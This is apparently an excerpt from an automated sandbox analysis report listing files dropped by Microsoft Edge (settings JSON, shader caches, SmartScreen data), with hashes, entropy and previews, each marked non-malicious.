                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b47c.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):262512
                                                                                                                                                                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:LsNlJKl/ll:Ls3JKl/ll
                                                                                                                                                                                                                                                                                                      MD5:D06178B7FC33EC3B2833D0617D52FC7E
                                                                                                                                                                                                                                                                                                      SHA1:3BEBCE6D3903AA915267FA9ED9A10EC9B5695B5E
                                                                                                                                                                                                                                                                                                      SHA-256:FB96B1119C388995EC082102A08C0155699EDFC1E4919DB63716CAA226C08CC8
                                                                                                                                                                                                                                                                                                      SHA-512:D17508C0978414E6FB49602EED568DE65E83B4DB934543CF38F6DBFCC3384AA6A1F941E44A19E5F680EA5C27705D32C78172F4AC4421EBBF8CF5A776C395B18C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.........................................QjF../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):14
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                                      MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                                      SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                                      SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                                      SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
